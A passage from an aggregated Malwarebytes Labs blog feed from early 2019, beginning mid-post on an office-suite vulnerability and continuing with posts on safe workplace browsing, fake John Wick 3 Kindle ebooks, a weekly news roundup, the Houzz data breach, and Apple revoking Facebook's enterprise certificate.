We tested several proof of concepts shared by John Lambert.  The process flow typically goes like this: soffice.exe -> soffice.bin -> cmd.exe -> calc.exe

The vulnerability has been patched in LibreOffice but not in Apache OpenOffice—yet. Malwarebytes users were already protected against it without the need for a detection update.

Time will tell if this vulnerability ends up being used in the wild. It’s worth noting that not everyone uses Microsoft Office, and threat actors could consider it for targeting specific victims they know may be using open-source productivity software.

The post New critical vulnerability in open-source office suites appeared first on Malwarebytes Labs.

Categories: Malware Bytes

How to browse the Internet safely at work

Malware Bytes Security - Tue, 02/05/2019 - 11:00am

This Safer Internet Day, we teamed up with ethical hacking and web application security company Detectify to provide security tips for both workplace Internet users and web developers. This article is aimed at employees of all levels. If you’re a programmer looking to create secure websites, visit Detectify’s blog to read their guide to HTTP security headers for web developers.

More and more businesses are becoming security- and privacy-conscious—as they should be. When in years past, IT departments’ pleas for a bigger cybersecurity budget fell on deaf ears, this year, things have started looking up. Indeed, there is nothing quite like a lengthening string of security breaches to grab people’s—and executives’—attention.

Purely reacting to events is a bad terrible approach, and organizations who handle and store sensitive client information have learned this the hard way. It not only puts businesses in constant firefighting mode, but is also a sign that their current cybersecurity posture may be inadequate and in need of proper assessment and improvement.

Part of improving an organization’s cybersecurity posture has to do with increasing its employees’ awareness. Being their first line of defense, it’s only logical to educate users about cybersecurity best practices, as well as the latest threats and trends. In addition, by providing users with a set of standards to adhere to, and maintaining those standards, organizations can create an intentional culture of security.

Developing these training regimens requires a lot of time, effort, and perhaps a metaphorical arm and a leg. Do not be discouraged. Companies can start improving their security posture now by sharing with employees a helpful and handy guide on how to safely browse the Internet at work, whether on a desktop, laptop, or mobile phone.

Safe Internet browsing at work: a guideline

Take note that some of what’s listed below may already be in your company’s Employee Internet Security Policy, but in case you don’t have such a policy in place (yet), the list below is a good starting point.

Make sure that your browser(s) installed on your work machine are up-to-date. The IT department may be responsible for updating employee operating systems (OSes) on remote and in-house devices, as well as other business-critical software. It may not be their job, however, to update software you’ve installed yourself, such as your preferred browser. The number one rule when browsing the Internet is to make sure that the browser is up-to-date. Threats such as malicious websites, malvertising, and exploit kits can find their way through vulnerabilities that out-of-date browsers leave behind.

While you’re at it, updating other software on your work devices keeps browser-based threats from finding other ways onto your system. If IT doesn’t already cover this, update your file-compressor, anti-malware program, productivity apps, and even media players. It’s a tedious and often time-consuming task, but—shall we say—updating is part of owning software. You can use a software updater program to make the ordeal more manageable. Just don’t forget to update your updater, too.

If you have software programs you no longer use or need, uninstall them. Let’s be practical: There’s really no reason to keep software if you’ve stopped using it or if it’s just part of bloatware that came with your computer. It’s also likely that, since you’re not using that software, it’s incredibly outdated, making it an easy avenue for the bad guys to exploit. So do yourself a favor and get rid. That’s one less program to update.

Know thy browser and make the most of its features. Modern-day browsers like Brave, Vivaldi, and Microsoft Edge have launched quite a bit differently than their predecessors. Other than their appealing customization schemes, they also boast of being secure (or private) by default. By contrast, browsers that have been around for a long time continue to improve on these aspects, as well as their versatility and performance.

Regardless of which browser you use, make it a point to review its settings (if you haven’t already) and configure them with security and privacy in mind. The US-CERT has more detailed information on how to secure browsers, which you can read through here.

Refrain from visiting sites that your colleagues or boss would frown upon if they look over your shoulder. Most employees know that visiting and navigating to sites that are not safe for work (NSFW) is a no-no, but they still do it. Trouble is, not only does this welcome malware and other threats that target visitors of such sites, but it could also result in being—rightfully or not—accused of sexual harassment. Browsing sites of a pornographic nature could make coworkers incredibly uncomfortable, and if this behavior is generally tolerated by the brass, it could result in the company becoming the subject of a hostile environment claim. So if hackers don’t scare you, maybe a lawsuit will.

Use a password manager. It may sound like this advice is out of place, but we include it for a reason. Password managers don’t just store a multitude of passwords and keep them safe. They can also stop your browser from pre-filling fields on seemingly legitimate, but ultimately malicious sites, making it an unlikely protector against phishing attempts. So the next time you receive an email from your “bank” telling you there’s a breach and you have to update your password, and your password manager refuses to pre-fill that information, scrutinize the URL in the address bar carefully. You might be on a site you don’t want to be on.

Read: Why you don’t need 27 different passwords

Consider installing apps that act as another layer of protection. There is a trove of fantastic browser apps out there that a privacy- and security-conscious employee can greatly benefit from. Ad blockers, for instance, can strip out ads on sites that have been used by malicious actors before in malvertising campaigns. Tracker blockers allow one to block trackers on sites that monitor their behavior and gather information about them without their consent. Script blockers disable or prevent the execution of browser scripts, which criminals can misuse. Other apps, such as HTTPS Everywhere, force one’s browser to direct users to available HTTPS versions of websites.

Consider sandboxing. A sandbox is software that emulates an environment where one can browse the Internet and run programs independently from the actual endpoint. It’s typically used for testing and analyzing files to check if they’re safe to deploy and run.

We’re not saying that employees should know how to analyze files (although kudos if you can). Only that employees who normally open attachments from their personal emails, stumble into sites that may be deemed sketchy at best, or want to check out programs from third-party vendors do so in a safe setup that is isolated from their office network. Here is a list of free sandbox software you can read more about if you’re interested in trying one out.

Assume you are a target. Not many employees would like to admit this. In fact, it may not have crossed their minds until now. A lot of small businesses, for example, would like to think that they cannot be targets of cyberattacks because criminals wouldn’t go after “the little guy.” But various surveys, intelligence, and research tell a different story.

Employees need to change their thinking. Each time we go online at work, whether for valid reasons or not, we are putting our companies at risk. So we must take the initiative to browse safely, adopt cybersecurity best practices, and embrace training sessions with open minds. Realize that a lot is at stake in the office environment, and a single mouse click on a bad link could bring down an entire business. Do you want to be the person responsible?

We’re all in this together

When it comes to preventing online threats from infiltrating your organization’s network and keeping sensitive company and client data secure, it is true that they are no longer just IT concerns. Cybersecurity and privacy are and should be every employee’s concern—from the rank-and-file up to the managerial and executive level.

Indeed, no one should be exempted from continuous cybersecurity training, nor high-ranking officials should go on thinking that company policies don’t apply to them. If every employee can adhere to the simple guideline above, we believe that organizations of all sizes are already in a better security posture than before. This is just the first step, however. There is still the need for organizations to assess their cybersecurity and privacy needs, so they can effectively invest in tools and services that help better secure their unique work environment. Whatever changes they choose to implement that require employee participation, IT and high-ranking work officials must ensure that everyone is in it together.

Stay safe!

More Safer Internet Day blog posts:

The post How to browse the Internet safely at work appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Movie stream ebooks gun for John Wick 3 on Kindle store

Malware Bytes Security - Mon, 02/04/2019 - 12:30pm

We discovered a novel spam campaign over the weekend, targeting fans of John Wick on the Amazon Kindle store. The scam itself involves paying for what appears to be the upcoming third movie, turns into a bogus ebook, and goes on to hyperlink potential victims to a collection of third-party websites.

How does this begin?

With a dog, a grieving assassin, and a pencil.

Actually, it begins with me hunting for John Wick graphic novels on the Kindle store. What I found isn’t exactly hidden from view—as you can see from the screenshots, the bogus results kick in right under the second genuine entry:

Click to enlarge

What are we looking at here?

Roughly 40 or more individual items uploaded from around January 25 to February 2, each one from a different “author.” At first glance, you might think you’re looking at movies, thanks to the play button icon on each image preview. The fact that each entry is called something along the lines of “John Wick 3: free movie HD” probably helps, too.

Click to Enlarge

All of the items are on sale for a variety of prices including £0.99 each, £9.93, £12.19, and up to an astonishing £15.25 (roughly $20 USD). A few of them are listed as free, and all of them have a preview available.

Click to enlarge

At this point, someone seeing this may think they’re actually buying a copy of John Wick 3. This is where it gets interesting.

This isn’t John Wick 3, is it?

Correct, it absolutely is not John Wick 3. What we have here is an incredibly basic ebook with a “play movie” image bolted onto the preview. Opening up the preview gives us a slice of “coming soon” style text for the movie, due out in May.

The text reads as follows, and appears to be the same content used in each ebook:

John Wick: Chapter 3 – Parabellum 

When we last observed John Wick, he wasn’t in the best shape as he’d quite recently had a worldwide contract hit put out on him toward the finish of John Wick: Chapter 2.  

So most would agree that the third motion picture in the hit activity establishment, driven by Keanu Reeves, won’t be a steady walk around the recreation center. Indeed, even the full title, John Wick: 

Chapter 3 – Parabellum, insights at the massacre in store as Reeves clarified recently.  

“[It means] get ready for war. It’s a piece of that popular sentence, ‘Si vis pacem, para bellum’ which interprets as, ‘On the off chance that you need harmony, get ready for war’,” he laid out. All things considered, Wick said he’d “execute them all” toward the finish of Chapter 2.

Looking at the “Click here” text isn’t useful on a mobile device, because in practice I couldn’t get it to recognise my clicks. I also couldn’t figure out what the clickable link was from looking at it on the mobile, either. With that in mind, it was time to port over to a desktop and fire up an appropriate reader.

A quick port to a desktop reader later, and we now have a fully clickable link:

Click to enlarge

Where does the link go?

It takes would-be Wick watchers to:


Which is a portal that claims to offer up multiple movies:

Click to enlarge

The movie we’re interested in here is John Wick 3:

Click to enlarge

No matter what you do at this point, the only option here is “be forwarded to another site” via the register button: 

Click to enlarge

Our tour of the movie world upside-down now takes us to:


Click to enlarge

This style of site may be familiar to regular readers. They typically claim to offer all sorts of media content and claim free sign ups, but there’s usually a rolling charge or fees somewhere in the mix. The site says the following:

You agree that, on registration for a Membership, you authorise us to place a pre-authorisation hold (between USD $1.00 to 2.00) on your Payment Card to validate your billing address and other Payment Card information.

Depending on your region, you may find yourself sent to similar sites like:


Click to enlarge

However, there is no further information in the T&C or Privacy Policy for either site that states exactly what sort of payment is (or isn’t) expected after signing up. One thing is for certain: Someone wasting up to £15 on a bogus ebook then bouncing from site to site isn’t going to end up with a legitimate version of John Wick 3.

Don’t set him off

It’s tricky to flag dubious content on the Kindle store, as you have to report each title individually and give reasons. We contacted Amazon customer support and have been informed these ebooks have been escalated to the appropriate teams.

Amazon has had problems with fake ebooks before, though those were in the business of swiping author’s content and making as much money as possible before being shut down. What we have here are worthless ebooks with no content, save for clickthrough links to streaming portals. At time of writing, the ebooks we discovered are still available for purchase.

If you’re on the hunt for John Wick, the lesson is clear: don’t bring an ebook to a gunfight.

The post Movie stream ebooks gun for John Wick 3 on Kindle store appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (January 28 – February 3)

Malware Bytes Security - Mon, 02/04/2019 - 12:00pm

Last week, we ran another in our interview with a malware hunter series, explained a FaceTime vulnerability, and took a deep dive into a new stealer. We also threw some light  on a Houzz data breach, and what exactly happened between Apple and Facebook.

Other cybersecurity news
  • Kwik Fit hit by malware: Car service specialist runs into trouble when systems go offline. (Source: BBC)
  • Mozilla publishes tracking policy: Mozilla fleshes out out their vision of what is and isn’t acceptable in tracking land. (Source: Mozilla)
  • Distracting smart speakers: How you can effectively drown out your smart speaker with a bit of distraction. (Source: The Register)
  • Privacy attack aimed at 3/4/5G users: Theoretical fake mobile towers are back in business, with an investment in monitoring device owner activities. (Source: Help Net Security)
  • How my Instagram was hacked: A good warning about the perils of password reuse. (Source: Naked Security)
  • Social media identity thieves: Scammers will stop at nothing to pull some heartstrings and make a little money in the bargain. (Source: ABC news)
  • Another smart home hacked: A family recounts their horror at seeing portions of their home cut open for someone’s amusement. (Source: Komando)
  • Facebook mashup: Plans to combine Whatsapp, Instagram, and Facebook Messenger are revealed with security questions raised. (Source: New York Times)
  • Phishing attacks continue to rise: Worrying stats via security experts polled who agree in large numbers that phishing is at the same level or higher than it was previously. (Source: Mashable)
  • Researchers discover malware-friendly hosting service: After a spike in infections, researchers track things back to a host that looked like a “hornet’s nest of malware.” (Source: TechCrunch)

Stay safe, everyone!

The post A week in security (January 28 – February 3) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Houzz data breach: Why informing your customers is the right call

Malware Bytes Security - Fri, 02/01/2019 - 1:00pm

Houzz is an online platform dedicated to home renovation and design. Today (February 1, 2019), they notified their customers about a data breach that reportedly happened in December 2018.

Data breaches unfortunately have become a common event. In fact, we dubbed 2018 the year of the data breach tsunami. Also Houzz is not a giant corporation with millions of customers. So why are we writing about this, you may ask? Mainly because we feel there are some giant corporations out there who can learn from this event as an example on how to handle a data breach properly.


Discovering and informing your customers about a breach that happened less than two months ago is a lot better than what we have seen recently. They did not wait until the investigation on how the breach happened was finished. As soon as they knew what was stolen, they decided to inform those concerned. Of course it is imperative that you get this information into your customers’ hands as soon as possible. Which is probably why the investigation is being conducted by a leading forensics firm. Law enforcement has been notified as well.

Informing customers

Houzz informed their customers directly by email, as well as on their website, about the breach. They said:

Houzz recently learned that a file containing some of our user data was obtained by an unauthorized third party.

The mail starts with this disclosure, goes on to explain what happened, and which information was stolen. It also contains a link to their website, where you can find more information.

The information given is concise and precise—not just some general remark that no financial information was stolen, which thankfully wasn’t indeed. Houzz included a list of information that was stolen.

The following types of information could have been impacted by this incident:

  • Certain publicly visible information from a user’s Houzz profile only if the user made this information publicly available (e.g., first name, last name, city, state, country, profile description)
  • Certain internal identifiers and fields that have no discernible meaning to anyone outside of Houzz (e.g. country of site used, whether a user has a profile image)
  • Certain internal account information (e.g., user ID, prior Houzz usernames, one-way encrypted passwords salted uniquely per user, IP address, and city and ZIP code inferred from IP address) and certain publicly available account information (e.g., current Houzz username and if a user logs into Houzz through Facebook, the user’s public Facebook ID)

Importantly, this incident does not involve Social Security numbers or payment card, bank account, or other financial information.

On the website, customers can find detailed information on how to change their password. And, like we have done in the past, they advise their customers to use a unique password for each service, which does not need to be as big a hassle as you might expect.


Houzz announced security improvements without going into detail. While customers might find this vague, it makes sense to withhold the specifics, as the investigation is ongoing, and they wouldn’t want to make threat actors any wiser. Seeing that they were already using one-way encrypted passwords salted uniquely per user was certainly encouraging.

Dealing with data breaches

Data breaches happen all the time. It happens to the best of companies. It’s the way those organizations deal with them that can save face. What other businesses can take away from this example:

  • Inform customers as soon as it makes sense and be precise about the stolen information.
  • Approach your customers directly. Don’t let them read about it in the papers or social media.
  • Engage law enforcement and a firm specialized in forensic investigations.
  • Learn from what went wrong and improve on that.

Stay safe, everyone!

The post Houzz data breach: Why informing your customers is the right call appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Apple pulls Facebook enterprise certificate

Malware Bytes Security - Thu, 01/31/2019 - 11:44am

It’s been an astonishing few days for Facebook. They’ve seen both an app and their enterprise certificate removed and revoked with big consequences.

What happened?

Apple issue enterprise certificates to organizations with which they can create internal apps. Those apps don’t end up released on the Apple store, because the terms of service don’t allow it. Anything storefront-bound must go through the mandatory app checks by Apple before being loaded up for sale.

What went wrong?

Facebook put together a “Facebook research” market research app using the internal process. However, they then went on to distribute it externally to non-Facebook employees. And by “non Facebook employees” we mean “people between the ages of 13 to 35.” In return for access to large swathes of user data, the participants received monthly $20 gift cards.

The program was managed via various Beta testing services, and within hours of news breaking, Facebook stated they’d pulled the app.

Problem solved?

Not exactly. Apple has, in fact, revoked Facebook’s certificate, essentially breaking all of their internal apps and causing major disruptions for their 33,000 or so employees in the process. As per the Apple statement:

We designed our Enterprise Developer Program solely for the internal distribution of apps within an organization. Facebook has been using their membership to distribute a data-collecting app to consumers…a clear breach of their agreement.


Yes, whoops. Now the race is on to get things back up and running over at Facebook HQ. Things may be a little tense behind the scenes due to, uh, something similar involving a VPN-themed app collecting data it shouldn’t have been earlier this year. That one didn’t use the developer certificate, but it took some 33 million downloads before Apple noticed and decided to pull the plug.

Could things get any worse for Facebook?

Cue Senator Ed Markey, with a statement on this particular subject:

It is inherently manipulative to offer teens money in exchange for their personal information when younger users don’t have a clear understanding of how much data they’re handing over and how sensitive it is,” said Senator Markey. “I strongly urge Facebook to immediately cease its recruitment of teens for its Research Program and explicitly prohibit minors from participating. Congress also needs to pass legislation that updates children’s online privacy rules for the 21st century. I will be reintroducing my ‘Do Not Track Kids Act’ to update the Children’s Online Privacy Protection Act by instituting key privacy safeguards for teens.

But my concerns also extend to adult users. I am alarmed by reports that Facebook is not providing participants with complete information about the extent of the information that the company can access through this program. Consumers deserve simple and clear explanations of what data is being collected and how it being used.

Well, that definitely sounds like a slide towards “worse” instead of “better.”

A one-two punch?

Facebook is already drawing heavy criticism this past week for the wonderfully-named “friendly fraud” practice of kids making dubious purchases, and chargebacks being made. It happens, sure, but perhaps not quite like this. From the linked Register article:

Facebook, according to the full lawsuit, was encouraging game devs to build Facebook-hosted games that allowed children to input parents’ credit card details, save those details, and then bill over and over without further authorisation.

While large amounts of money were being spent, some refunds proved to be problematic. Employees were querying why most apps with child-related issues are “defaulting to the highest-cost setting in the purchase flows.” You’d better believe there may be further issues worth addressing.

What next?

The Facebook research program app will continue to run on Android, which is unaffected by the certificate antics. There’s also this app from Google in Apple land which has since been pulled due to also operating under Apple’s developer enterprise program. No word yet as to whether or not Apple will revoke Google’s certificate, too. It could be a bumpy few days for some organizations as we wait to see what Apple does next. Facebook, too, could certainly do with a lot less bad publicity as it struggles to regain positive momentum. Whether that happens or not remains to be seen.

The post Apple pulls Facebook enterprise certificate appeared first on Malwarebytes Labs.

Categories: Malware Bytes